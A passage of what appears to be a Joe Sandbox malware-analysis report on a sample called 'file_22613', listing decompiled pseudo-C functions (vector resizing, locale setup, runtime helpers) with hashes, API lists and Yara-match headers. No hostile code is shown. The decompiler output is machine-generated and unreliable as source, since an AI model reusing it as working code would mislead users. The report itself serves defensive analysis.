                                                                                  • Part of subcall function 00421126: RaiseException.KERNEL32(0040404E,?,N@@,?,?,?,?,?,0040404E,?,hAD,00000000), ref: 00421168
                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040F06C
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Copy_strExceptionException@8H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 637683493-0
                                                                                • Opcode ID: 707634a921c0c10fd2f33e892302f4a4a7c9a1a0539888a80e497f1c097a9c5c
                                                                                • Instruction ID: 351f9480eb81dbd4ede676fc091eb4fa21244b21298f4da9ee5b39182e7784d1
                                                                                • Opcode Fuzzy Hash: 707634a921c0c10fd2f33e892302f4a4a7c9a1a0539888a80e497f1c097a9c5c
                                                                                • Instruction Fuzzy Hash: 110171B1941744EEC721EF5A808148EFFE0BF28314B80C56FF59A57641C738A648CB9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 90%
                                                                                			E0042793D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				signed int _t12;
                                                                                				void* _t28;
                                                                                				intOrPtr _t29;
                                                                                				void* _t30;
                                                                                				void* _t31;
                                                                                
                                                                                				_t31 = __eflags;
                                                                                				_t26 = __edi;
                                                                                				_t25 = __edx;
                                                                                				_t20 = __ebx;
                                                                                				_push(0xc);
                                                                                				_push(0x443ec8);
                                                                                				E00424400(__ebx, __edi, __esi);
                                                                                				_t28 = E00427B66(__edx, __edi, _t31);
                                                                                				_t12 =  *0x447bf0; // 0xfffffffe
                                                                                				if(( *(_t28 + 0x70) & _t12) == 0) {
                                                                                					L6:
                                                                                					E00429078(0xc);
                                                                                					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                                                					_t29 = _t28 + 0x6c;
                                                                                					 *((intOrPtr*)(_t30 - 0x1c)) = E004278F0(_t29,  *0x447e38);
                                                                                					 *(_t30 - 4) = 0xfffffffe;
                                                                                					E004279AA();
                                                                                				} else {
                                                                                					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                						goto L6;
                                                                                					} else {
                                                                                						_t29 =  *((intOrPtr*)(E00427B66(__edx, _t26, _t33) + 0x6c));
                                                                                					}
                                                                                				}
                                                                                				_t34 = _t29;
                                                                                				if(_t29 == 0) {
                                                                                					E004243E2(_t20, _t25, _t26, _t29, _t34, 0x20);
                                                                                				}
                                                                                				return E00424445(_t29);
                                                                                			}








                                                                                0x0042793d
                                                                                0x0042793d
                                                                                0x0042793d
                                                                                0x0042793d
                                                                                0x0042793d
                                                                                0x0042793f
                                                                                0x00427944
                                                                                0x0042794e
                                                                                0x00427950
                                                                                0x00427958
                                                                                0x0042797c
                                                                                0x0042797e
                                                                                0x00427984
                                                                                0x0042798e
                                                                                0x00427999
                                                                                0x0042799c
                                                                                0x004279a3
                                                                                0x0042795a
                                                                                0x0042795a
                                                                                0x0042795e
                                                                                0x00000000
                                                                                0x00427960
                                                                                0x00427965
                                                                                0x00427965
                                                                                0x0042795e
                                                                                0x00427968
                                                                                0x0042796a
                                                                                0x0042796e
                                                                                0x00427973
                                                                                0x0042797b

                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 00427949
                                                                                  • Part of subcall function 00427B66: __getptd_noexit.LIBCMT ref: 00427B69
                                                                                  • Part of subcall function 00427B66: __amsg_exit.LIBCMT ref: 00427B76
                                                                                • __getptd.LIBCMT ref: 00427960
                                                                                • __amsg_exit.LIBCMT ref: 0042796E
                                                                                • __lock.LIBCMT ref: 0042797E
                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00427992
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                • String ID:
                                                                                • API String ID: 938513278-0
                                                                                • Opcode ID: b74019e941badcc367a1999a771556c98f961c38dd32cdfea6873b8bb65c1eda
                                                                                • Instruction ID: e8c6be1ed61c114043ad7cb55415433062d12361f1126b0585603bfae2aa802c
                                                                                • Opcode Fuzzy Hash: b74019e941badcc367a1999a771556c98f961c38dd32cdfea6873b8bb65c1eda
                                                                                • Instruction Fuzzy Hash: 43F06272B497309BE720BB79B842B5D3690AF01B2DFA0424FE504672D2CB6C5941CA5E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E004145DB(void* __ebx, signed int* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                                                				intOrPtr _t48;
                                                                                				signed int _t53;
                                                                                				void* _t58;
                                                                                				intOrPtr _t59;
                                                                                				intOrPtr _t62;
                                                                                				void* _t63;
                                                                                				void* _t65;
                                                                                				intOrPtr* _t67;
                                                                                				signed int* _t68;
                                                                                				void* _t75;
                                                                                				signed int _t77;
                                                                                				intOrPtr _t85;
                                                                                				signed int* _t89;
                                                                                				signed int _t93;
                                                                                				void* _t96;
                                                                                				void* _t97;
                                                                                
                                                                                				_push(0x2c);
                                                                                				E004219DE(E00435F11, __ebx, __edi, __esi);
                                                                                				_t72 =  *(_t96 + 8);
                                                                                				_t91 = __esi | 0xffffffff;
                                                                                				_t89 = __ecx;
                                                                                				if(_t72 != _t91) {
                                                                                					_t77 =  *( *(__ecx + 0x24));
                                                                                					__eflags = _t77;
                                                                                					if(_t77 == 0) {
                                                                                						L6:
                                                                                						__eflags = _t89[0x15];
                                                                                						if(_t89[0x15] != 0) {
                                                                                							E00414E42(_t89);
                                                                                							__eflags = _t89[0x11];
                                                                                							if(__eflags != 0) {
                                                                                								 *(_t96 - 0x2d) = _t72;
                                                                                								E00414BD3(_t72, _t89, _t96 - 0x2c, __eflags);
                                                                                								_t11 = _t96 - 4;
                                                                                								 *_t11 =  *(_t96 - 4) & 0x00000000;
                                                                                								__eflags =  *_t11;
                                                                                								while(1) {
                                                                                									__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
                                                                                									_t48 =  *((intOrPtr*)(_t96 - 0x2c));
                                                                                									if( *((intOrPtr*)(_t96 - 0x18)) >= 0x10) {
                                                                                										_t85 =  *((intOrPtr*)(_t96 - 0x2c));
                                                                                									} else {
                                                                                										_t48 = _t96 - 0x2c;
                                                                                										_t85 = _t48;
                                                                                									}
                                                                                									_t78 = _t89[0x11];
                                                                                									_t93 =  *(_t89[0x11]);
                                                                                									_t72 =  *((intOrPtr*)(_t96 - 0x1c)) + _t48;
                                                                                									_t53 =  *((intOrPtr*)(_t93 + 0x14))( &(_t89[0x13]), _t96 - 0x2d, _t96 - 0x2c, _t96 - 0x38, _t85,  *((intOrPtr*)(_t96 - 0x1c)) + _t48, _t96 - 0x34);
                                                                                									__eflags = _t53;
                                                                                									if(_t53 < 0) {
                                                                                										break;
                                                                                									}
                                                                                									__eflags = _t53 - 1;
                                                                                									if(_t53 > 1) {
                                                                                										__eflags = _t53 - 3;
                                                                                										if(__eflags != 0) {
                                                                                											break;
                                                                                										}
                                                                                										_push(_t89[0x15]);
                                                                                										_push( *(_t96 - 0x2d));
                                                                                										_t58 = E0041F70F(_t72, _t89, _t93, __eflags);
                                                                                										_t91 = _t93 | 0xffffffff;
                                                                                										__eflags = _t58 - _t91;
                                                                                										if(_t58 == _t91) {
                                                                                											L31:
                                                                                											E00402C34(_t96 - 0x2c, 1, 0);
                                                                                											goto L7;
                                                                                										}
                                                                                										L29:
                                                                                										_t91 =  *(_t96 + 8);
                                                                                										goto L31;
                                                                                									}
                                                                                									__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
                                                                                									_t59 =  *((intOrPtr*)(_t96 - 0x2c));
                                                                                									if( *((intOrPtr*)(_t96 - 0x18)) < 0x10) {
                                                                                										_t59 = _t96 - 0x2c;
                                                                                									}
                                                                                									_t93 =  *((intOrPtr*)(_t96 - 0x34)) - _t59;
                                                                                									__eflags = _t93;
                                                                                									if(_t93 == 0) {
                                                                                										L22:
                                                                                										_t89[0x12] = 1;
                                                                                										__eflags =  *((intOrPtr*)(_t96 - 0x38)) - _t96 - 0x2d;
                                                                                										if( *((intOrPtr*)(_t96 - 0x38)) != _t96 - 0x2d) {
                                                                                											goto L29;
                                                                                										}
                                                                                										__eflags = _t93;
                                                                                										if(_t93 != 0) {
                                                                                											continue;
                                                                                										}
                                                                                										__eflags =  *((intOrPtr*)(_t96 - 0x1c)) - 0x20;
                                                                                										if( *((intOrPtr*)(_t96 - 0x1c)) >= 0x20) {
                                                                                											break;
                                                                                										}
                                                                                										_push(_t93);
                                                                                										_t75 = 8;
                                                                                										E0040D70E(_t75, _t78, _t96 - 0x2c, _t96);
                                                                                										continue;
                                                                                									} else {
                                                                                										__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
                                                                                										_t62 =  *((intOrPtr*)(_t96 - 0x2c));
                                                                                										if(__eflags < 0) {
                                                                                											_t62 = _t96 - 0x2c;
                                                                                										}
                                                                                										_push(_t89[0x15]);
                                                                                										_push(_t93);
                                                                                										_push(1);
                                                                                										_push(_t62);
                                                                                										_t63 = E00420840(_t72, _t85, _t89, _t93, __eflags);
                                                                                										_t97 = _t97 + 0x10;
                                                                                										__eflags = _t93 - _t63;
                                                                                										if(_t93 != _t63) {
                                                                                											break;
                                                                                										}
                                                                                										goto L22;
                                                                                									}
                                                                                								}
                                                                                								_t91 = _t93 | 0xffffffff;
                                                                                								__eflags = _t93 | 0xffffffff;
                                                                                								goto L31;
                                                                                							}
                                                                                							_push(_t89[0x15]);
                                                                                							_push(_t72);
                                                                                							_t65 = E0041F70F(_t72, _t89, _t91, __eflags);
                                                                                							__eflags = _t65 - _t91;
                                                                                							if(_t65 != _t91) {
                                                                                								L2:
                                                                                								return E00421A61(_t72, _t89, _t91);
                                                                                							}
                                                                                						}
                                                                                						L7:
                                                                                						goto L2;
                                                                                					}
                                                                                					_t67 =  *((intOrPtr*)(__ecx + 0x34));
                                                                                					__eflags = _t77 -  *_t67 + _t77;
                                                                                					if(_t77 >=  *_t67 + _t77) {
                                                                                						goto L6;
                                                                                					}
                                                                                					 *_t67 =  *_t67 - 1;
                                                                                					_t89 =  *(__ecx + 0x24);
                                                                                					_t68 =  *_t89;
                                                                                					 *_t89 =  &(_t68[0]);
                                                                                					 *_t68 = _t72;
                                                                                					goto L2;
                                                                                				}
                                                                                				goto L2;
                                                                                			}



















                                                                                0x004145db
                                                                                0x004145e2
                                                                                0x004145e7
                                                                                0x004145ea
                                                                                0x004145ed
                                                                                0x004145f1
                                                                                0x00414600
                                                                                0x00414602
                                                                                0x00414604
                                                                                0x00414623
                                                                                0x00414623
                                                                                0x00414627
                                                                                0x0041462f
                                                                                0x00414634
                                                                                0x00414638
                                                                                0x00414653
                                                                                0x00414656
                                                                                0x0041465b
                                                                                0x0041465b
                                                                                0x0041465b
                                                                                0x0041465f
                                                                                0x0041465f
                                                                                0x00414663
                                                                                0x00414666
                                                                                0x004146fe
                                                                                0x0041466c
                                                                                0x0041466c
                                                                                0x0041466f
                                                                                0x0041466f
                                                                                0x00414671
                                                                                0x00414674
                                                                                0x0041467d
                                                                                0x00414691
                                                                                0x00414694
                                                                                0x00414696
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041469c
                                                                                0x0041469f
                                                                                0x00414706
                                                                                0x00414709
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041470f
                                                                                0x00414712
                                                                                0x00414713
                                                                                0x00414718
                                                                                0x0041471d
                                                                                0x0041471f
                                                                                0x00414729
                                                                                0x00414730
                                                                                0x00000000
                                                                                0x00414730
                                                                                0x00414721
                                                                                0x00414721
                                                                                0x00000000
                                                                                0x00414721
                                                                                0x004146a1
                                                                                0x004146a5
                                                                                0x004146a8
                                                                                0x004146aa
                                                                                0x004146aa
                                                                                0x004146b0
                                                                                0x004146b0
                                                                                0x004146b2
                                                                                0x004146d3
                                                                                0x004146d6
                                                                                0x004146da
                                                                                0x004146dd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004146df
                                                                                0x004146e1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004146e7
                                                                                0x004146eb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004146ed
                                                                                0x004146f0
                                                                                0x004146f4
                                                                                0x00000000
                                                                                0x004146b4
                                                                                0x004146b4
                                                                                0x004146b8
                                                                                0x004146bb
                                                                                0x004146bd
                                                                                0x004146bd
                                                                                0x004146c0
                                                                                0x004146c3
                                                                                0x004146c4
                                                                                0x004146c6
                                                                                0x004146c7
                                                                                0x004146cc
                                                                                0x004146cf
                                                                                0x004146d1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004146d1
                                                                                0x004146b2
                                                                                0x00414726
                                                                                0x00414726
                                                                                0x00000000
                                                                                0x00414726
                                                                                0x0041463a
                                                                                0x00414640
                                                                                0x00414641
                                                                                0x00414647
                                                                                0x0041464c
                                                                                0x004145f5
                                                                                0x004145fa
                                                                                0x004145fa
                                                                                0x0041464e
                                                                                0x00414629
                                                                                0x00000000
                                                                                0x00414629
                                                                                0x00414606
                                                                                0x0041460d
                                                                                0x0041460f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00414611
                                                                                0x00414613
                                                                                0x00414616
                                                                                0x0041461b
                                                                                0x0041461d
                                                                                0x00000000
                                                                                0x0041461f
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fputc$H_prolog3_
                                                                                • String ID:
                                                                                • API String ID: 668804286-3916222277
                                                                                • Opcode ID: ef47f16c0367422376313d94ba93b47ab01917955661245194ee2ca7fca3368c
                                                                                • Instruction ID: d36e586d645ca0a6884918d23c657dff743b66b7d24b2ee2d935c5040e0d3755
                                                                                • Opcode Fuzzy Hash: ef47f16c0367422376313d94ba93b47ab01917955661245194ee2ca7fca3368c
                                                                                • Instruction Fuzzy Hash: 0E41E631E00119EFCF20DBA8D8809EEB7B5BF5A359F104117E521A7681D73CE895CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E0041500D(void* __ebx, void* __edi, signed int* __esi) {
                                                                                				unsigned int _t36;
                                                                                				unsigned int _t37;
                                                                                				signed int _t41;
                                                                                				signed int _t44;
                                                                                				void* _t55;
                                                                                				signed int _t56;
                                                                                				signed int _t59;
                                                                                				signed int _t60;
                                                                                				unsigned int _t61;
                                                                                				signed int _t62;
                                                                                				signed int _t63;
                                                                                				signed int _t66;
                                                                                				signed int* _t72;
                                                                                				signed int _t76;
                                                                                				signed int _t77;
                                                                                				signed int _t78;
                                                                                				void* _t80;
                                                                                				signed int _t81;
                                                                                				signed int _t82;
                                                                                				signed int* _t85;
                                                                                				signed int* _t86;
                                                                                				void* _t87;
                                                                                
                                                                                				_t85 = __esi;
                                                                                				_t55 = __ebx;
                                                                                				_t59 =  *__esi;
                                                                                				_push(__edi);
                                                                                				asm("cdq");
                                                                                				_t76 = 0x1c;
                                                                                				_t77 = (__esi[1] - _t59) / _t76;
                                                                                				if(_t77 > 0x9249248) {
                                                                                					E0041D3B9("vector<T> too long");
                                                                                				}
                                                                                				asm("cdq");
                                                                                				_t60 = 0x1c;
                                                                                				_t36 = (_t85[2] - _t59) / _t60;
                                                                                				_t78 = _t77 + 1;
                                                                                				if(_t78 <= _t36) {
                                                                                					return _t36;
                                                                                				} else {
                                                                                					_t61 = _t36;
                                                                                					_t37 = _t36 >> 1;
                                                                                					if(0x9249249 - _t37 >= _t61) {
                                                                                						_t62 = _t61 + _t37;
                                                                                						__eflags = _t62;
                                                                                					} else {
                                                                                						_t62 = 0;
                                                                                					}
                                                                                					if(_t62 < _t78) {
                                                                                						_t62 = _t78;
                                                                                					}
                                                                                					_t72 = _t85;
                                                                                					_pop(_t80);
                                                                                					_push(8);
                                                                                					E004219A8(E004369CC, _t55, _t80, _t85);
                                                                                					_t56 = _t62;
                                                                                					_t86 = _t72;
                                                                                					if(_t56 > 0x9249249) {
                                                                                						E0041D3B9("vector<T> too long");
                                                                                					}
                                                                                					_t41 = _t86[2] -  *_t86;
                                                                                					asm("cdq");
                                                                                					_t63 = 0x1c;
                                                                                					_t42 = _t41 / _t63;
                                                                                					_t95 = _t41 / _t63 - _t56;
                                                                                					if(_t41 / _t63 < _t56) {
                                                                                						_t44 = E0041510A(_t56, _t80, _t86);
                                                                                						 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
                                                                                						 *(_t87 - 0x14) = _t44;
                                                                                						_push( *(_t87 - 0x14));
                                                                                						_push( *(_t87 - 0x14));
                                                                                						_push(_t86[1]);
                                                                                						E00415420(_t56,  *_t86, _t80, _t86, _t95);
                                                                                						_t66 =  *_t86;
                                                                                						asm("cdq");
                                                                                						_t81 = 0x1c;
                                                                                						_t82 = (_t86[1] - _t66) / _t81;
                                                                                						if(_t66 != 0) {
                                                                                							E0040E28F(_t66, _t86[1]);
                                                                                							_push( *_t86);
                                                                                							E0041DFFD();
                                                                                						}
                                                                                						_t42 =  *(_t87 - 0x14);
                                                                                						_t86[2] = _t56 * 0x1c + _t42;
                                                                                						_t86[1] = _t82 * 0x1c + _t42;
                                                                                						 *_t86 = _t42;
                                                                                					}
                                                                                					return E00421A4D(_t42);
                                                                                				}
                                                                                			}

























                                                                                0x0041500d
                                                                                0x0041500d
                                                                                0x0041500d
                                                                                0x00415012
                                                                                0x00415017
                                                                                0x00415018
                                                                                0x0041501b
                                                                                0x00415023
                                                                                0x0041502a
                                                                                0x0041502a
                                                                                0x00415036
                                                                                0x00415037
                                                                                0x00415038
                                                                                0x0041503a
                                                                                0x0041503d
                                                                                0x00415063
                                                                                0x0041503f
                                                                                0x0041503f
                                                                                0x00415041
                                                                                0x0041504c
                                                                                0x00415052
                                                                                0x00415052
                                                                                0x0041504e
                                                                                0x0041504e
                                                                                0x0041504e
                                                                                0x00415056
                                                                                0x00415058
                                                                                0x00415058
                                                                                0x0041505a
                                                                                0x0041505c
                                                                                0x00415064
                                                                                0x0041506b
                                                                                0x00415070
                                                                                0x00415072
                                                                                0x0041507a
                                                                                0x00415081
                                                                                0x00415081
                                                                                0x00415089
                                                                                0x0041508d
                                                                                0x0041508e
                                                                                0x0041508f
                                                                                0x00415091
                                                                                0x00415093
                                                                                0x00415097
                                                                                0x0041509c
                                                                                0x004150a2
                                                                                0x004150a5
                                                                                0x004150ab
                                                                                0x004150ae
                                                                                0x004150af
                                                                                0x004150b4
                                                                                0x004150c0
                                                                                0x004150c1
                                                                                0x004150c4
                                                                                0x004150c8
                                                                                0x004150cf
                                                                                0x004150d4
                                                                                0x004150d6
                                                                                0x004150db
                                                                                0x004150dc
                                                                                0x004150e9
                                                                                0x004150ec
                                                                                0x004150ef
                                                                                0x004150ef
                                                                                0x004150f6
                                                                                0x004150f6

                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0041502A
                                                                                  • Part of subcall function 0041D3B9: std::exception::exception.LIBCMT ref: 0041D3CE
                                                                                  • Part of subcall function 0041D3B9: __CxxThrowException@8.LIBCMT ref: 0041D3E3
                                                                                  • Part of subcall function 0041D3B9: std::exception::exception.LIBCMT ref: 0041D3F4
                                                                                • __EH_prolog3_catch.LIBCMT ref: 0041506B
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00415081
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                • String ID: vector<T> too long
                                                                                • API String ID: 2448322171-3788999226
                                                                                • Opcode ID: ea10eb534e56437e673a6a8207653f0b33d0e920b89673a9f5cd7eb97e0659fd
                                                                                • Instruction ID: d7a5fa660dc45334f118aae398986fbed4eb9c2be1413dd2a810f30ebc390bdd
                                                                                • Opcode Fuzzy Hash: ea10eb534e56437e673a6a8207653f0b33d0e920b89673a9f5cd7eb97e0659fd
                                                                                • Instruction Fuzzy Hash: D821F676B40601CBC718AEBED941AAEBBD2AFD9700F21442FE156D7280D975DC804758
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E0040399D(void* __ebx, void* __edi, signed int* __esi) {
                                                                                				unsigned int _t36;
                                                                                				unsigned int _t37;
                                                                                				signed int _t41;
                                                                                				signed int _t44;
                                                                                				void* _t55;
                                                                                				signed int _t56;
                                                                                				signed int _t59;
                                                                                				signed int _t60;
                                                                                				unsigned int _t61;
                                                                                				signed int _t62;
                                                                                				signed int _t63;
                                                                                				signed int _t66;
                                                                                				signed int* _t72;
                                                                                				signed int _t76;
                                                                                				signed int _t77;
                                                                                				signed int _t78;
                                                                                				void* _t80;
                                                                                				signed int _t81;
                                                                                				signed int _t82;
                                                                                				signed int* _t85;
                                                                                				signed int* _t86;
                                                                                				void* _t87;
                                                                                
                                                                                				_t85 = __esi;
                                                                                				_t55 = __ebx;
                                                                                				_t59 =  *__esi;
                                                                                				_push(__edi);
                                                                                				asm("cdq");
                                                                                				_t76 = 0x44;
                                                                                				_t77 = (__esi[1] - _t59) / _t76;
                                                                                				if(_t77 > 0x3c3c3c2) {
                                                                                					E0041D3B9("vector<T> too long");
                                                                                				}
                                                                                				asm("cdq");
                                                                                				_t60 = 0x44;
                                                                                				_t36 = (_t85[2] - _t59) / _t60;
                                                                                				_t78 = _t77 + 1;
                                                                                				if(_t78 <= _t36) {
                                                                                					return _t36;
                                                                                				} else {
                                                                                					_t61 = _t36;
                                                                                					_t37 = _t36 >> 1;
                                                                                					if(0x3c3c3c3 - _t37 >= _t61) {
                                                                                						_t62 = _t61 + _t37;
                                                                                						__eflags = _t62;
                                                                                					} else {
                                                                                						_t62 = 0;
                                                                                					}
                                                                                					if(_t62 < _t78) {
                                                                                						_t62 = _t78;
                                                                                					}
                                                                                					_t72 = _t85;
                                                                                					_pop(_t80);
                                                                                					_push(8);
                                                                                					E004219A8(E00436428, _t55, _t80, _t85);
                                                                                					_t56 = _t62;
                                                                                					_t86 = _t72;
                                                                                					if(_t56 > 0x3c3c3c3) {
                                                                                						E0041D3B9("vector<T> too long");
                                                                                					}
                                                                                					_t41 = _t86[2] -  *_t86;
                                                                                					asm("cdq");
                                                                                					_t63 = 0x44;
                                                                                					_t42 = _t41 / _t63;
                                                                                					_t95 = _t41 / _t63 - _t56;
                                                                                					if(_t41 / _t63 < _t56) {
                                                                                						_t44 = E00403E65(_t56, _t80, _t86);
                                                                                						 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
                                                                                						 *(_t87 - 0x14) = _t44;
                                                                                						_push( *(_t87 - 0x14));
                                                                                						_push( *(_t87 - 0x14));
                                                                                						_push(_t86[1]);
                                                                                						E00404130(_t56,  *_t86, _t86, _t95);
                                                                                						_t66 =  *_t86;
                                                                                						asm("cdq");
                                                                                						_t81 = 0x44;
                                                                                						_t82 = (_t86[1] - _t66) / _t81;
                                                                                						if(_t66 != 0) {
                                                                                							E00403BE2(_t66, _t86[1]);
                                                                                							_push( *_t86);
                                                                                							E0041DFFD();
                                                                                						}
                                                                                						_t42 =  *(_t87 - 0x14);
                                                                                						_t86[2] = _t56 * 0x44 + _t42;
                                                                                						_t86[1] = _t82 * 0x44 + _t42;
                                                                                						 *_t86 = _t42;
                                                                                					}
                                                                                					return E00421A4D(_t42);
                                                                                				}
                                                                                			}

























                                                                                0x0040399d
                                                                                0x0040399d
                                                                                0x0040399d
                                                                                0x004039a2
                                                                                0x004039a7
                                                                                0x004039a8
                                                                                0x004039ab
                                                                                0x004039b3
                                                                                0x004039ba
                                                                                0x004039ba
                                                                                0x004039c6
                                                                                0x004039c7
                                                                                0x004039c8
                                                                                0x004039ca
                                                                                0x004039cd
                                                                                0x004039f3
                                                                                0x004039cf
                                                                                0x004039cf
                                                                                0x004039d1
                                                                                0x004039dc
                                                                                0x004039e2
                                                                                0x004039e2
                                                                                0x004039de
                                                                                0x004039de
                                                                                0x004039de
                                                                                0x004039e6
                                                                                0x004039e8
                                                                                0x004039e8
                                                                                0x004039ea
                                                                                0x004039ec
                                                                                0x00403b3c
                                                                                0x00403b43
                                                                                0x00403b48
                                                                                0x00403b4a
                                                                                0x00403b52
                                                                                0x00403b59
                                                                                0x00403b59
                                                                                0x00403b61
                                                                                0x00403b65
                                                                                0x00403b66
                                                                                0x00403b67
                                                                                0x00403b69
                                                                                0x00403b6b
                                                                                0x00403b6f
                                                                                0x00403b74
                                                                                0x00403b7a
                                                                                0x00403b7d
                                                                                0x00403b83
                                                                                0x00403b86
                                                                                0x00403b87
                                                                                0x00403b8c
                                                                                0x00403b98
                                                                                0x00403b99
                                                                                0x00403b9c
                                                                                0x00403ba0
                                                                                0x00403ba7
                                                                                0x00403bac
                                                                                0x00403bae
                                                                                0x00403bb3
                                                                                0x00403bb4
                                                                                0x00403bc1
                                                                                0x00403bc4
                                                                                0x00403bc7
                                                                                0x00403bc7
                                                                                0x00403bce
                                                                                0x00403bce

                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 004039BA
                                                                                  • Part of subcall function 0041D3B9: std::exception::exception.LIBCMT ref: 0041D3CE
                                                                                  • Part of subcall function 0041D3B9: __CxxThrowException@8.LIBCMT ref: 0041D3E3
                                                                                  • Part of subcall function 0041D3B9: std::exception::exception.LIBCMT ref: 0041D3F4
                                                                                • __EH_prolog3_catch.LIBCMT ref: 00403B43
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00403B59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                • String ID: vector<T> too long
                                                                                • API String ID: 2448322171-3788999226
                                                                                • Opcode ID: caf408bf7c7c78d234a452ac1165b3b65d77af9f98161fa7f32abaea09853c7e
                                                                                • Instruction ID: 27951e7f13cd3f9d89d7299612a9be919273ff00fdd7874b3ca4fc8345b1606b
                                                                                • Opcode Fuzzy Hash: caf408bf7c7c78d234a452ac1165b3b65d77af9f98161fa7f32abaea09853c7e
                                                                                • Instruction Fuzzy Hash: 3821F8B2B002014BC714AF7ED982A2DBAE6ABD4305B20443FE296E73C1D979E9408719
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 57%
                                                                                			E00415E72(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t27;
                                                                                				void* _t40;
                                                                                				intOrPtr _t49;
                                                                                				intOrPtr _t50;
                                                                                				intOrPtr _t58;
                                                                                				intOrPtr _t60;
